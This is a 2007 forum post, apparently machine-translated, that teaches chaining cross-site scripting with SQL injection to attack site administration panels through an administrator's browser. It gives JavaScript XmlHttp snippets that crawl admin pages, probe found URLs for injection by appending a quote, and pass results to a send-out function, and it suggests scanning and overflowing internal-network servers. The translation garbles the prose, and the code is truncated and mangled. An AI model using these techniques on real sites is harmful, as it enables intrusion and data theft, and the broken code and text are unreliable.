Administrator
Number of posts: 83
Age: 35
Localisation: USA
Registration date: 2007-05-28
 |  Subject: Sql-Injection in XSS  Wed Dec 26, 2007 4:51 pm | |
| SQL INJECTION IN XSS
1, the local authority restrictions always people feel reassured, such
as background, the net ..... But the official denied that some
procedural loopholes in the background risk, such as * vbbs standby to
previous data that are shell attitude. Indeed, in the authority,
subject to such loopholes it is difficult to be used directly. Xss and
above on the case, programmers are often overlooked and not very good
defense, if two conditions to match, it means that the use of the
degree of difficulty greatly decreased ...
2, and then some
people would say that is entirely possible xss attack through
"hijacked" cookie, the direct successor authority: such as direct
landing background. Indeed it is a good method, but there are some
direct and background are now set ip state. Therefore, we can use the
xss completed background automatically direct a series of attacks such
as SQL-injection.
3, for open procedures, you can htm / js code
to automatically attack you the background to the function, but if you
are completely black box?
SIX Principle:
1, the use of flow charts
Hack -----------> outlook>
^
|
Background <<
^
|
Administrators --------------
2, xmlhttp quietly let your code implementation:
Luoluo brother was "a simple package XmlHttp" codz: http://pstgroup.blogspot.com/2007/08/javascript.html
SIX of use:
1, by the code behind the url:
Var xmlhttp = new XmlHttp ();
If (xmlhttp.init ()) (
Xmlhttp.get ( "http://localhost:808/index.php", the function (s) (
/ / Through the administrator landing prospects are times to connect all the background such as search by admin / index.php
Var re = new RegExp ( "
Var m = null;
While ((m = re.exec (s))! = Null) (
Alert (m [1]);
SendUrl (m [1 ]);// reality you want to write a function to send this
data and preservation, could not be used xmlhttp here to send, not
because xmlhttp Cross-domain.
)
));
)
2, in times background scanning injection point connecting the code:
Var xmlhttp = new XmlHttp ();
If (xmlhttp.init ()) (
Xmlhttp.get ( "http://localhost:808/admin/index.php", the function (s) (
Var re = new RegExp ( "
Var m = null;
While ((m = re.exec (s))! = Null) (
Var xmlhttp = new XmlHttp ();
If (xmlhttp.init ()) (
Xmlhttp.get (m [1] " '", function (s1) (
If (s1! = Null) (
Alert (s1);
SendUrl (s1);
)
))
/ / Alert (m [1]);
)
));
)
This simply connect behind the increase in a 'detection.
3, after the attack by the code: not available
The code written in very rough, if you do a lot of things integrity needs to be done. 
SIX within the network:
Many network within the web is no way outside net visit, if we are to
SIX within the network, we need to solve the problem is Cross-domain
issues:
1, img iframe script, etc., may Cross-domain.
2, xmlhttp not Cross-domain, but they can meet certain Cross-domain vulnerability.
Steps:
(1), Port Scanning
Javascript Based Port Scanner: http://www.securiteam.com/exploits/5DP010KJFE.html
Flash port scanner: http://scan.flashsec.org/classes/Main.as
(2), scanning and scanning are times url injection point attack
If the use of this the img iframe html script, it is more difficult to
achieve, but if you use the above code can not xmlhttp direct
Cross-domain, it must meet certain Cross-domain vulnerabilities [which
look for the Cross-domain Activex is a very good direction?]
(3),
Overflow in Xss [OIX]: (this is digression): Cross-domain if we can,
then we can use direct overflow xmlhttp network within ftp / http
servers, of course, use img iframe script, and so on can also overflow
http / ftp server some url's overflow. Depend on the specific
circumstances
_________________
By M4st3r.w4n1
|
|
